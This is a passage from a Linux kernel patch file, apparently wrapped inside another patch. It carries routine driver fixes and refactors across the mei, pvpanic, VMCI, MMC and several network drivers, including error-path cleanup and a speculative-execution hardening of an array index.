+ 
+ err_aux_dev_add_0:
+ 	auxiliary_device_uninit(&aux_bus->aux_device_wrapper[0]->aux_dev);
++	goto err_ret;
+ 
+ err_aux_dev_init_0:
+ 	ida_free(&gp_client_ida, aux_bus->aux_device_wrapper[0]->aux_dev.id);
+@@ -127,6 +131,7 @@ static int gp_aux_bus_probe(struct pci_dev *pdev, const struct pci_device_id *id
+ err_ida_alloc_0:
+ 	kfree(aux_bus->aux_device_wrapper[0]);
+ 
++err_ret:
+ 	return retval;
+ }
+ 
+diff --git a/drivers/misc/mei/pci-me.c b/drivers/misc/mei/pci-me.c
+index a4bdc41284582..dd4d92fa44c65 100644
+--- a/drivers/misc/mei/pci-me.c
++++ b/drivers/misc/mei/pci-me.c
+@@ -394,8 +394,10 @@ static int mei_me_pci_resume(struct device *device)
+ 	}
+ 
+ 	err = mei_restart(dev);
+-	if (err)
++	if (err) {
++		free_irq(pdev->irq, dev);
+ 		return err;
++	}
+ 
+ 	/* Start timer if stopped in suspend */
+ 	schedule_delayed_work(&dev->timer_work, HZ);
+diff --git a/drivers/misc/pvpanic/pvpanic-mmio.c b/drivers/misc/pvpanic/pvpanic-mmio.c
+index eb97167c03fb4..9715798acce3d 100644
+--- a/drivers/misc/pvpanic/pvpanic-mmio.c
++++ b/drivers/misc/pvpanic/pvpanic-mmio.c
+@@ -24,52 +24,9 @@ MODULE_AUTHOR("Hu Tao <hutao@cn.fujitsu.com>");
+ MODULE_DESCRIPTION("pvpanic-mmio device driver");
+ MODULE_LICENSE("GPL");
+ 
+-static ssize_t capability_show(struct device *dev, struct device_attribute *attr, char *buf)
+-{
+-	struct pvpanic_instance *pi = dev_get_drvdata(dev);
+-
+-	return sysfs_emit(buf, "%x\n", pi->capability);
+-}
+-static DEVICE_ATTR_RO(capability);
+-
+-static ssize_t events_show(struct device *dev, struct device_attribute *attr, char *buf)
+-{
+-	struct pvpanic_instance *pi = dev_get_drvdata(dev);
+-
+-	return sysfs_emit(buf, "%x\n", pi->events);
+-}
+-
+-static ssize_t events_store(struct device *dev, struct device_attribute *attr,
+-			    const char *buf, size_t count)
+-{
+-	struct pvpanic_instance *pi = dev_get_drvdata(dev);
+-	unsigned int tmp;
+-	int err;
+-
+-	err = kstrtouint(buf, 16, &tmp);
+-	if (err)
+-		return err;
+-
+-	if ((tmp & pi->capability) != tmp)
+-		return -EINVAL;
+-
+-	pi->events = tmp;
+-
+-	return count;
+-}
+-static DEVICE_ATTR_RW(events);
+-
+-static struct attribute *pvpanic_mmio_dev_attrs[] = {
+-	&dev_attr_capability.attr,
+-	&dev_attr_events.attr,
+-	NULL
+-};
+-ATTRIBUTE_GROUPS(pvpanic_mmio_dev);
+-
+ static int pvpanic_mmio_probe(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+-	struct pvpanic_instance *pi;
+ 	struct resource *res;
+ 	void __iomem *base;
+ 
+@@ -92,18 +49,7 @@ static int pvpanic_mmio_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
+-	pi = devm_kmalloc(dev, sizeof(*pi), GFP_KERNEL);
+-	if (!pi)
+-		return -ENOMEM;
+-
+-	pi->base = base;
+-	pi->capability = PVPANIC_PANICKED | PVPANIC_CRASH_LOADED;
+-
+-	/* initialize capability by RDPT */
+-	pi->capability &= ioread8(base);
+-	pi->events = pi->capability;
+-
+-	return devm_pvpanic_probe(dev, pi);
++	return devm_pvpanic_probe(dev, base);
+ }
+ 
+ static const struct of_device_id pvpanic_mmio_match[] = {
+@@ -123,7 +69,7 @@ static struct platform_driver pvpanic_mmio_driver = {
+ 		.name = "pvpanic-mmio",
+ 		.of_match_table = pvpanic_mmio_match,
+ 		.acpi_match_table = pvpanic_device_ids,
+-		.dev_groups = pvpanic_mmio_dev_groups,
++		.dev_groups = pvpanic_dev_groups,
+ 	},
+ 	.probe = pvpanic_mmio_probe,
+ };
+diff --git a/drivers/misc/pvpanic/pvpanic-pci.c b/drivers/misc/pvpanic/pvpanic-pci.c
+index 07eddb5ea30fa..2494725dfacfa 100644
+--- a/drivers/misc/pvpanic/pvpanic-pci.c
++++ b/drivers/misc/pvpanic/pvpanic-pci.c
+@@ -22,51 +22,8 @@ MODULE_AUTHOR("Mihai Carabas <mihai.carabas@oracle.com>");
+ MODULE_DESCRIPTION("pvpanic device driver");
+ MODULE_LICENSE("GPL");
+ 
+-static ssize_t capability_show(struct device *dev, struct device_attribute *attr, char *buf)
+-{
+-	struct pvpanic_instance *pi = dev_get_drvdata(dev);
+-
+-	return sysfs_emit(buf, "%x\n", pi->capability);
+-}
+-static DEVICE_ATTR_RO(capability);
+-
+-static ssize_t events_show(struct device *dev, struct device_attribute *attr, char *buf)
+-{
+-	struct pvpanic_instance *pi = dev_get_drvdata(dev);
+-
+-	return sysfs_emit(buf, "%x\n", pi->events);
+-}
+-
+-static ssize_t events_store(struct device *dev, struct device_attribute *attr,
+-			    const char *buf, size_t count)
+-{
+-	struct pvpanic_instance *pi = dev_get_drvdata(dev);
+-	unsigned int tmp;
+-	int err;
+-
+-	err = kstrtouint(buf, 16, &tmp);
+-	if (err)
+-		return err;
+-
+-	if ((tmp & pi->capability) != tmp)
+-		return -EINVAL;
+-
+-	pi->events = tmp;
+-
+-	return count;
+-}
+-static DEVICE_ATTR_RW(events);
+-
+-static struct attribute *pvpanic_pci_dev_attrs[] = {
+-	&dev_attr_capability.attr,
+-	&dev_attr_events.attr,
+-	NULL
+-};
+-ATTRIBUTE_GROUPS(pvpanic_pci_dev);
+-
+ static int pvpanic_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ {
+-	struct pvpanic_instance *pi;
+ 	void __iomem *base;
+ 	int ret;
+ 
+@@ -78,18 +35,7 @@ static int pvpanic_pci_probe(struct pci_dev *pdev, const struct pci_device_id *e
+ 	if (!base)
+ 		return -ENOMEM;
+ 
+-	pi = devm_kmalloc(&pdev->dev, sizeof(*pi), GFP_KERNEL);
+-	if (!pi)
+-		return -ENOMEM;
+-
+-	pi->base = base;
+-	pi->capability = PVPANIC_PANICKED | PVPANIC_CRASH_LOADED;
+-
+-	/* initlize capability by RDPT */
+-	pi->capability &= ioread8(base);
+-	pi->events = pi->capability;
+-
+-	return devm_pvpanic_probe(&pdev->dev, pi);
++	return devm_pvpanic_probe(&pdev->dev, base);
+ }
+ 
+ static const struct pci_device_id pvpanic_pci_id_tbl[]  = {
+@@ -102,8 +48,6 @@ static struct pci_driver pvpanic_pci_driver = {
+ 	.name =         "pvpanic-pci",
+ 	.id_table =     pvpanic_pci_id_tbl,
+ 	.probe =        pvpanic_pci_probe,
+-	.driver = {
+-		.dev_groups = pvpanic_pci_dev_groups,
+-	},
++	.dev_groups =   pvpanic_dev_groups,
+ };
+ module_pci_driver(pvpanic_pci_driver);
+diff --git a/drivers/misc/pvpanic/pvpanic.c b/drivers/misc/pvpanic/pvpanic.c
+index 049a120063489..305b367e0ce34 100644
+--- a/drivers/misc/pvpanic/pvpanic.c
++++ b/drivers/misc/pvpanic/pvpanic.c
+@@ -7,6 +7,7 @@
+  *  Copyright (C) 2021 Oracle.
+  */
+ 
++#include <linux/device.h>
+ #include <linux/io.h>
+ #include <linux/kernel.h>
+ #include <linux/kexec.h>
+@@ -26,6 +27,13 @@ MODULE_AUTHOR("Mihai Carabas <mihai.carabas@oracle.com>");
+ MODULE_DESCRIPTION("pvpanic device driver");
+ MODULE_LICENSE("GPL");
+ 
++struct pvpanic_instance {
++	void __iomem *base;
++	unsigned int capability;
++	unsigned int events;
++	struct list_head list;
++};
++
+ static struct list_head pvpanic_list;
+ static spinlock_t pvpanic_lock;
+ 
+@@ -81,11 +89,75 @@ static void pvpanic_remove(void *param)
+ 	spin_unlock(&pvpanic_lock);
+ }
+ 
+-int devm_pvpanic_probe(struct device *dev, struct pvpanic_instance *pi)
++static ssize_t capability_show(struct device *dev, struct device_attribute *attr, char *buf)
++{
++	struct pvpanic_instance *pi = dev_get_drvdata(dev);
++
++	return sysfs_emit(buf, "%x\n", pi->capability);
++}
++static DEVICE_ATTR_RO(capability);
++
++static ssize_t events_show(struct device *dev, struct device_attribute *attr, char *buf)
++{
++	struct pvpanic_instance *pi = dev_get_drvdata(dev);
++
++	return sysfs_emit(buf, "%x\n", pi->events);
++}
++
++static ssize_t events_store(struct device *dev, struct device_attribute *attr,
++			    const char *buf, size_t count)
++{
++	struct pvpanic_instance *pi = dev_get_drvdata(dev);
++	unsigned int tmp;
++	int err;
++
++	err = kstrtouint(buf, 16, &tmp);
++	if (err)
++		return err;
++
++	if ((tmp & pi->capability) != tmp)
++		return -EINVAL;
++
++	pi->events = tmp;
++
++	return count;
++}
++static DEVICE_ATTR_RW(events);
++
++static struct attribute *pvpanic_dev_attrs[] = {
++	&dev_attr_capability.attr,
++	&dev_attr_events.attr,
++	NULL
++};
++
++static const struct attribute_group pvpanic_dev_group = {
++	.attrs = pvpanic_dev_attrs,
++};
++
++const struct attribute_group *pvpanic_dev_groups[] = {
++	&pvpanic_dev_group,
++	NULL
++};
++EXPORT_SYMBOL_GPL(pvpanic_dev_groups);
++
++int devm_pvpanic_probe(struct device *dev, void __iomem *base)
+ {
+-	if (!pi || !pi->base)
++	struct pvpanic_instance *pi;
++
++	if (!base)
+ 		return -EINVAL;
+ 
++	pi = devm_kmalloc(dev, sizeof(*pi), GFP_KERNEL);
++	if (!pi)
++		return -ENOMEM;
++
++	pi->base = base;
++	pi->capability = PVPANIC_PANICKED | PVPANIC_CRASH_LOADED;
++
++	/* initialize capability by RDPT */
++	pi->capability &= ioread8(base);
++	pi->events = pi->capability;
++
+ 	spin_lock(&pvpanic_lock);
+ 	list_add(&pi->list, &pvpanic_list);
+ 	spin_unlock(&pvpanic_lock);
+diff --git a/drivers/misc/pvpanic/pvpanic.h b/drivers/misc/pvpanic/pvpanic.h
+index 4935459517548..46ffb10438adf 100644
+--- a/drivers/misc/pvpanic/pvpanic.h
++++ b/drivers/misc/pvpanic/pvpanic.h
+@@ -8,13 +8,7 @@
+ #ifndef PVPANIC_H_
+ #define PVPANIC_H_
+ 
+-struct pvpanic_instance {
+-	void __iomem *base;
+-	unsigned int capability;
+-	unsigned int events;
+-	struct list_head list;
+-};
+-
+-int devm_pvpanic_probe(struct device *dev, struct pvpanic_instance *pi);
++int devm_pvpanic_probe(struct device *dev, void __iomem *base);
++extern const struct attribute_group *pvpanic_dev_groups[];
+ 
+ #endif /* PVPANIC_H_ */
+diff --git a/drivers/misc/vmw_vmci/vmci_event.c b/drivers/misc/vmw_vmci/vmci_event.c
+index 2100297c94ad0..a1205bce0b7ee 100644
+--- a/drivers/misc/vmw_vmci/vmci_event.c
++++ b/drivers/misc/vmw_vmci/vmci_event.c
+@@ -9,6 +9,7 @@
+ #include <linux/vmw_vmci_api.h>
+ #include <linux/list.h>
+ #include <linux/module.h>
++#include <linux/nospec.h>
+ #include <linux/sched.h>
+ #include <linux/slab.h>
+ #include <linux/rculist.h>
+@@ -86,9 +87,12 @@ static void event_deliver(struct vmci_event_msg *event_msg)
+ {
+ 	struct vmci_subscription *cur;
+ 	struct list_head *subscriber_list;
++	u32 sanitized_event, max_vmci_event;
+ 
+ 	rcu_read_lock();
+-	subscriber_list = &subscriber_array[event_msg->event_data.event];
++	max_vmci_event = ARRAY_SIZE(subscriber_array);
++	sanitized_event = array_index_nospec(event_msg->event_data.event, max_vmci_event);
++	subscriber_list = &subscriber_array[sanitized_event];
+ 	list_for_each_entry_rcu(cur, subscriber_list, node) {
+ 		cur->callback(cur->id, &event_msg->event_data,
+ 			      cur->callback_data);
+diff --git a/drivers/mmc/host/davinci_mmc.c b/drivers/mmc/host/davinci_mmc.c
+index 7138dfa065bfa..e89a97b415154 100644
+--- a/drivers/mmc/host/davinci_mmc.c
++++ b/drivers/mmc/host/davinci_mmc.c
+@@ -1345,7 +1345,7 @@ static int davinci_mmcsd_probe(struct platform_device *pdev)
+ 	return ret;
+ }
+ 
+-static int __exit davinci_mmcsd_remove(struct platform_device *pdev)
++static int davinci_mmcsd_remove(struct platform_device *pdev)
+ {
+ 	struct mmc_davinci_host *host = platform_get_drvdata(pdev);
+ 
+@@ -1402,7 +1402,7 @@ static struct platform_driver davinci_mmcsd_driver = {
+ 		.of_match_table = davinci_mmc_dt_ids,
+ 	},
+ 	.probe		= davinci_mmcsd_probe,
+-	.remove		= __exit_p(davinci_mmcsd_remove),
++	.remove		= davinci_mmcsd_remove,
+ 	.id_table	= davinci_mmc_devtype,
+ };
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_hwrm.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_hwrm.c
+index 132442f16fe67..7a4e08b5a8c1b 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_hwrm.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_hwrm.c
+@@ -678,7 +678,7 @@ static int __hwrm_send(struct bnxt *bp, struct bnxt_hwrm_ctx *ctx)
+ 			    req_type);
+ 	else if (rc && rc != HWRM_ERR_CODE_PF_UNAVAILABLE)
+ 		hwrm_err(bp, ctx, "hwrm req_type 0x%x seq id 0x%x error 0x%x\n",
+-			 req_type, token->seq_id, rc);
++			 req_type, le16_to_cpu(ctx->req->seq_id), rc);
+ 	rc = __hwrm_to_stderr(rc);
+ exit:
+ 	if (token)
+diff --git a/drivers/net/ethernet/cavium/liquidio/lio_vf_rep.c b/drivers/net/ethernet/cavium/liquidio/lio_vf_rep.c
+index 600de587d7a98..e70b9ccca380e 100644
+--- a/drivers/net/ethernet/cavium/liquidio/lio_vf_rep.c
++++ b/drivers/net/ethernet/cavium/liquidio/lio_vf_rep.c
+@@ -272,13 +272,12 @@ lio_vf_rep_copy_packet(struct octeon_device *oct,
+ 				pg_info->page_offset;
+ 			memcpy(skb->data, va, MIN_SKB_SIZE);
+ 			skb_put(skb, MIN_SKB_SIZE);
++			skb_add_rx_frag(skb, skb_shinfo(skb)->nr_frags,
++					pg_info->page,
++					pg_info->page_offset + MIN_SKB_SIZE,
++					len - MIN_SKB_SIZE,
++					LIO_RXBUFFER_SZ);
+ 		}
+-
+-		skb_add_rx_frag(skb, skb_shinfo(skb)->nr_frags,
+-				pg_info->page,
+-				pg_info->page_offset + MIN_SKB_SIZE,
+-				len - MIN_SKB_SIZE,
+-				LIO_RXBUFFER_SZ);
+ 	} else {
+ 		struct octeon_skb_page_info *pg_info =
+ 			((struct octeon_skb_page_info *)(skb->cb));
+diff --git a/drivers/net/ethernet/google/gve/gve_rx_dqo.c b/drivers/net/ethernet/google/gve/gve_rx_dqo.c
+index a9409e3721ad7..0a36b284de10e 100644
+--- a/drivers/net/ethernet/google/gve/gve_rx_dqo.c
++++ b/drivers/net/ethernet/google/gve/gve_rx_dqo.c
+@@ -465,11 +465,13 @@ static void gve_rx_skb_hash(struct sk_buff *skb,
+ 	skb_set_hash(skb, le32_to_cpu(compl_desc->hash), hash_type);
+ }
+ 
+-static void gve_rx_free_skb(struct gve_rx_ring *rx)
++static void gve_rx_free_skb(struct napi_struct *napi, struct gve_rx_ring *rx)
+ {
+ 	if (!rx->ctx.skb_head)
+ 		return;
+ 
++	if (rx->ctx.skb_head == napi->skb)
++		napi->skb = NULL;
+ 	dev_kfree_skb_any(rx->ctx.skb_head);
+ 	rx->ctx.skb_head = NULL;
+ 	rx->ctx.skb_tail = NULL;
+@@ -693,7 +695,7 @@ int gve_rx_poll_dqo(struct gve_notify_block *block, int budget)
+ 
+ 		err = gve_rx_dqo(napi, rx, compl_desc, rx->q_num);
+ 		if (err < 0) {
+-			gve_rx_free_skb(rx);
++			gve_rx_free_skb(napi, rx);
+ 			u64_stats_update_begin(&rx->statss);
+ 			if (err == -ENOMEM)
+ 				rx->rx_skb_alloc_fail++;
+@@ -736,7 +738,7 @@ int gve_rx_poll_dqo(struct gve_notify_block *block, int budget)
+ 
+ 		/* gve_rx_complete_skb() will consume skb if successful */
+ 		if (gve_rx_complete_skb(rx, napi, compl_desc, feat) != 0) {
+-			gve_rx_free_skb(rx);
++			gve_rx_free_skb(napi, rx);
+ 			u64_stats_update_begin(&rx->statss);
+ 			rx->rx_desc_err_dropped_pkt++;
+ 			u64_stats_update_end(&rx->statss);
+diff --git a/drivers/net/ethernet/google/gve/gve_tx_dqo.c b/drivers/net/ethernet/google/gve/gve_tx_dqo.c
+index e84e944d751d2..5147fb37929e0 100644
+--- a/drivers/net/ethernet/google/gve/gve_tx_dqo.c
++++ b/drivers/net/ethernet/google/gve/gve_tx_dqo.c
+@@ -370,28 +370,18 @@ static int gve_prep_tso(struct sk_buff *skb)
+ 	if (unlikely(skb_shinfo(skb)->gso_size < GVE_TX_MIN_TSO_MSS_DQO))
+ 		return -1;
+ 
++	if (!(skb_shinfo(skb)->gso_type & (SKB_GSO_TCPV4 | SKB_GSO_TCPV6)))
++		return -EINVAL;
++
+ 	/* Needed because we will modify header. */
+ 	err = skb_cow_head(skb, 0);
+ 	if (err < 0)
+ 		return err;
+ 
+ 	tcp = tcp_hdr(skb);
+-
+-	/* Remove payload length from checksum. */
+ 	paylen = skb->len - skb_transport_offset(skb);
+-
+-	switch (skb_shinfo(skb)->gso_type) {
+-	case SKB_GSO_TCPV4:
+-	case SKB_GSO_TCPV6:
+-		csum_replace_by_diff(&tcp->check,
+-				     (__force __wsum)htonl(paylen));
+-
+-		/* Compute length of segmentation header. */
+-		header_len = skb_tcp_all_headers(skb);
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
++	csum_replace_by_diff(&tcp->check, (__force __wsum)htonl(paylen));
++	header_len = skb_tcp_all_headers(skb);
+ 
+ 	if (unlikely(header_len > GVE_TX_MAX_HDR_SIZE_DQO))
+ 		return -EINVAL;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 78d6752fe0519..4ce43c3a00a37 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -3538,6 +3538,9 @@ static int hns3_alloc_ring_buffers(struct hns3_enet_ring *ring)
+ 		ret = hns3_alloc_and_attach_buffer(ring, i);
+ 		if (ret)
+ 			goto out_buffer_fail;
++
++		if (!(i % HNS3_RESCHED_BD_NUM))
++			cond_resched();
+ 	}
+ 
+ 	return 0;
+@@ -5111,6 +5114,7 @@ int hns3_init_all_ring(struct hns3_nic_priv *priv)
+ 		}
+ 
+ 		u64_stats_init(&priv->ring[i].syncp);
++		cond_resched();
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.h b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.h
+index 294a14b4fdefb..1aac93f9aaa15 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.h
+@@ -214,6 +214,8 @@ enum hns3_nic_state {
+ #define HNS3_CQ_MODE_EQE			1U
+ #define HNS3_CQ_MODE_CQE			0U
+ 
++#define HNS3_RESCHED_BD_NUM			1024
++
+ enum hns3_pkt_l2t_type {
+ 	HNS3_L2_TYPE_UNICAST,
+ 	HNS3_L2_TYPE_MULTICAST,
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index a2655adc764cd..01e24b69e9203 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -3129,9 +3129,7 @@ static void hclge_push_link_status(struct hclge_dev *hdev)
+ 
+ static void hclge_update_link_status(struct hclge_dev *hdev)
+ {
+-	struct hnae3_handle *rhandle = &hdev->vport[0].roce;
+ 	struct hnae3_handle *handle = &hdev->vport[0].nic;
+-	struct hnae3_client *rclient = hdev->roce_client;
+ 	struct hnae3_client *client = hdev->nic_client;
+ 	int state;
+ 	int ret;
+@@ -3155,8 +3153,15 @@ static void hclge_update_link_status(struct hclge_dev *hdev)
+ 
+ 		client->ops->link_status_change(handle, state);
+ 		hclge_config_mac_tnl_int(hdev, state);
+-		if (rclient && rclient->ops->link_status_change)
+-			rclient->ops->link_status_change(rhandle, state);
++
++		if (test_bit(HCLGE_STATE_ROCE_REGISTERED, &hdev->state)) {
++			struct hnae3_handle *rhandle = &hdev->vport[0].roce;
++			struct hnae3_client *rclient = hdev->roce_client;
++
++			if (rclient && rclient->ops->link_status_change)
++				rclient->ops->link_status_change(rhandle,
++								 state);
++		}
+ 
+ 		hclge_push_link_status(hdev);
+ 	}
+@@ -11339,6 +11344,12 @@ static int hclge_init_client_instance(struct hnae3_client *client,
+ 	return ret;
+ }
+ 
++static bool hclge_uninit_need_wait(struct hclge_dev *hdev)
++{
++	return test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state) ||
++	       test_bit(HCLGE_STATE_LINK_UPDATING, &hdev->state);
++}
++
+ static void hclge_uninit_client_instance(struct hnae3_client *client,
+ 					 struct hnae3_ae_dev *ae_dev)
+ {
+@@ -11347,7 +11358,7 @@ static void hclge_uninit_client_instance(struct hnae3_client *client,
+ 
+ 	if (hdev->roce_client) {
+ 		clear_bit(HCLGE_STATE_ROCE_REGISTERED, &hdev->state);
+-		while (test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state))
++		while (hclge_uninit_need_wait(hdev))
+ 			msleep(HCLGE_WAIT_RESET_DONE);
+ 
+ 		hdev->roce_client->ops->uninit_instance(&vport->roce, 0);
+diff --git a/drivers/net/ethernet/intel/ice/ice.h b/drivers/net/ethernet/intel/ice/ice.h
+index f2be383d97df5..6d75e5638f665 100644
+--- a/drivers/net/ethernet/intel/ice/ice.h
++++ b/drivers/net/ethernet/intel/ice/ice.h
+@@ -388,7 +388,6 @@ struct ice_vsi {
+ 	struct ice_tc_cfg tc_cfg;
+ 	struct bpf_prog *xdp_prog;
+ 	struct ice_tx_ring **xdp_rings;	 /* XDP ring array */
+-	unsigned long *af_xdp_zc_qps;	 /* tracks AF_XDP ZC enabled qps */
+ 	u16 num_xdp_txq;		 /* Used XDP queues */
+ 	u8 xdp_mapping_mode;		 /* ICE_MAP_MODE_[CONTIG|SCATTER] */
+ 
+@@ -688,6 +687,25 @@ static inline void ice_set_ring_xdp(struct ice_tx_ring *ring)
+ 	ring->flags |= ICE_TX_FLAGS_RING_XDP;
+ }
+ 
++/**
++ * ice_get_xp_from_qid - get ZC XSK buffer pool bound to a queue ID
++ * @vsi: pointer to VSI
++ * @qid: index of a queue to look at XSK buff pool presence
++ *
++ * Return: A pointer to xsk_buff_pool structure if there is a buffer pool
++ * attached and configured as zero-copy, NULL otherwise.
++ */
++static inline struct xsk_buff_pool *ice_get_xp_from_qid(struct ice_vsi *vsi,
++							u16 qid)
++{
++	struct xsk_buff_pool *pool = xsk_get_pool_from_qid(vsi->netdev, qid);
++
++	if (!ice_is_xdp_ena_vsi(vsi))
++		return NULL;
++
++	return (pool && pool->dev) ? pool : NULL;
++}
++
+ /**
+  * ice_xsk_pool - get XSK buffer pool bound to a ring
+  * @ring: Rx ring to use
+@@ -700,10 +718,7 @@ static inline struct xsk_buff_pool *ice_xsk_pool(struct ice_rx_ring *ring)
+ 	struct ice_vsi *vsi = ring->vsi;
+ 	u16 qid = ring->q_index;
+ 
+-	if (!ice_is_xdp_ena_vsi(vsi) || !test_bit(qid, vsi->af_xdp_zc_qps))
+-		return NULL;
+-
+-	return xsk_get_pool_from_qid(vsi->netdev, qid);
++	return ice_get_xp_from_qid(vsi, qid);
+ }
+ 
+ /**
+@@ -728,12 +743,7 @@ static inline void ice_tx_xsk_pool(struct ice_vsi *vsi, u16 qid)
+ 	if (!ring)
+ 		return;
+ 
+-	if (!ice_is_xdp_ena_vsi(vsi) || !test_bit(qid, vsi->af_xdp_zc_qps)) {
+-		ring->xsk_pool = NULL;
+-		return;
+-	}
+-
+-	ring->xsk_pool = xsk_get_pool_from_qid(vsi->netdev, qid);
++	ring->xsk_pool = ice_get_xp_from_qid(vsi, qid);
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h b/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h
+index fe48164dce1e1..4d53c40a9de27 100644
+--- a/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h
++++ b/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h
+@@ -848,9 +848,9 @@ struct ice_aqc_txsched_elem {
+ 	u8 generic;
+ #define ICE_AQC_ELEM_GENERIC_MODE_M		0x1
+ #define ICE_AQC_ELEM_GENERIC_PRIO_S		0x1
+-#define ICE_AQC_ELEM_GENERIC_PRIO_M	(0x7 << ICE_AQC_ELEM_GENERIC_PRIO_S)
++#define ICE_AQC_ELEM_GENERIC_PRIO_M	        GENMASK(3, 1)
+ #define ICE_AQC_ELEM_GENERIC_SP_S		0x4
+-#define ICE_AQC_ELEM_GENERIC_SP_M	(0x1 << ICE_AQC_ELEM_GENERIC_SP_S)
++#define ICE_AQC_ELEM_GENERIC_SP_M	        GENMASK(4, 4)
+ #define ICE_AQC_ELEM_GENERIC_ADJUST_VAL_S	0x5
+ #define ICE_AQC_ELEM_GENERIC_ADJUST_VAL_M	\
+ 	(0x3 << ICE_AQC_ELEM_GENERIC_ADJUST_VAL_S)
+diff --git a/drivers/net/ethernet/intel/ice/ice_common.c b/drivers/net/ethernet/intel/ice/ice_common.c
+index 039342a0ed15a..419052ebc3ae7 100644
+--- a/drivers/net/ethernet/intel/ice/ice_common.c
++++ b/drivers/net/ethernet/intel/ice/ice_common.c
+@@ -789,8 +789,7 @@ static void ice_cleanup_fltr_mgmt_struct(struct ice_hw *hw)
+ 				devm_kfree(ice_hw_to_dev(hw), lst_itr);
+ 			}
+ 		}
+-		if (recps[i].root_buf)
+-			devm_kfree(ice_hw_to_dev(hw), recps[i].root_buf);
++		devm_kfree(ice_hw_to_dev(hw), recps[i].root_buf);
+ 	}
+ 	ice_rm_all_sw_replay_rule_info(hw);
+ 	devm_kfree(ice_hw_to_dev(hw), sw->recp_list);
+@@ -986,8 +985,7 @@ static int ice_cfg_fw_log(struct ice_hw *hw, bool enable)
+ 	}
+ 
+ out:
+-	if (data)
+-		devm_kfree(ice_hw_to_dev(hw), data);
++	devm_kfree(ice_hw_to_dev(hw), data);
+ 
+ 	return status;
+ }
+@@ -1105,6 +1103,9 @@ int ice_init_hw(struct ice_hw *hw)
+ 
+ 	hw->evb_veb = true;
+ 
++	/* init xarray for identifying scheduling nodes uniquely */
++	xa_init_flags(&hw->port_info->sched_node_ids, XA_FLAGS_ALLOC);
++
+ 	/* Query the allocated resources for Tx scheduler */
+ 	status = ice_sched_query_res_alloc(hw);
+ 	if (status) {
+diff --git a/drivers/net/ethernet/intel/ice/ice_controlq.c b/drivers/net/ethernet/intel/ice/ice_controlq.c
+index 6bcfee2959915..f68df8e05b18e 100644
+--- a/drivers/net/ethernet/intel/ice/ice_controlq.c
++++ b/drivers/net/ethernet/intel/ice/ice_controlq.c
+@@ -339,8 +339,7 @@ do {									\
+ 		}							\
+ 	}								\
+ 	/* free the buffer info list */					\
+-	if ((qi)->ring.cmd_buf)						\
+-		devm_kfree(ice_hw_to_dev(hw), (qi)->ring.cmd_buf);	\
++	devm_kfree(ice_hw_to_dev(hw), (qi)->ring.cmd_buf);		\
+ 	/* free DMA head */						\
+ 	devm_kfree(ice_hw_to_dev(hw), (qi)->ring.dma_head);		\
+ } while (0)
+diff --git a/drivers/net/ethernet/intel/ice/ice_flow.c b/drivers/net/ethernet/intel/ice/ice_flow.c
+index ef103e47a8dc2..85cca572c22a5 100644
+--- a/drivers/net/ethernet/intel/ice/ice_flow.c
++++ b/drivers/net/ethernet/intel/ice/ice_flow.c
+@@ -1303,23 +1303,6 @@ ice_flow_find_prof_id(struct ice_hw *hw, enum ice_block blk, u64 prof_id)
+ 	return NULL;
+ }
+ 
+-/**
+- * ice_dealloc_flow_entry - Deallocate flow entry memory
+- * @hw: pointer to the HW struct
+- * @entry: flow entry to be removed
+- */
+-static void
+-ice_dealloc_flow_entry(struct ice_hw *hw, struct ice_flow_entry *entry)
+-{
+-	if (!entry)
+-		return;
+-
+-	if (entry->entry)
+-		devm_kfree(ice_hw_to_dev(hw), entry->entry);
+-
+-	devm_kfree(ice_hw_to_dev(hw), entry);
+-}
+-
+ /**
+  * ice_flow_rem_entry_sync - Remove a flow entry
+  * @hw: pointer to the HW struct
+@@ -1335,7 +1318,8 @@ ice_flow_rem_entry_sync(struct ice_hw *hw, enum ice_block __always_unused blk,
+ 
+ 	list_del(&entry->l_entry);
+ 
+-	ice_dealloc_flow_entry(hw, entry);
++	devm_kfree(ice_hw_to_dev(hw), entry->entry);
++	devm_kfree(ice_hw_to_dev(hw), entry);
+ 
+ 	return 0;
+ }
+@@ -1662,8 +1646,7 @@ ice_flow_add_entry(struct ice_hw *hw, enum ice_block blk, u64 prof_id,
+ 
+ out:
+ 	if (status && e) {
+-		if (e->entry)
+-			devm_kfree(ice_hw_to_dev(hw), e->entry);
++		devm_kfree(ice_hw_to_dev(hw), e->entry);
+ 		devm_kfree(ice_hw_to_dev(hw), e);
+ 	}
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c
+index cc6c04a69b285..7661e735d0992 100644
+--- a/drivers/net/ethernet/intel/ice/ice_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_lib.c
+@@ -117,14 +117,8 @@ static int ice_vsi_alloc_arrays(struct ice_vsi *vsi)
+ 	if (!vsi->q_vectors)
+ 		goto err_vectors;
+ 
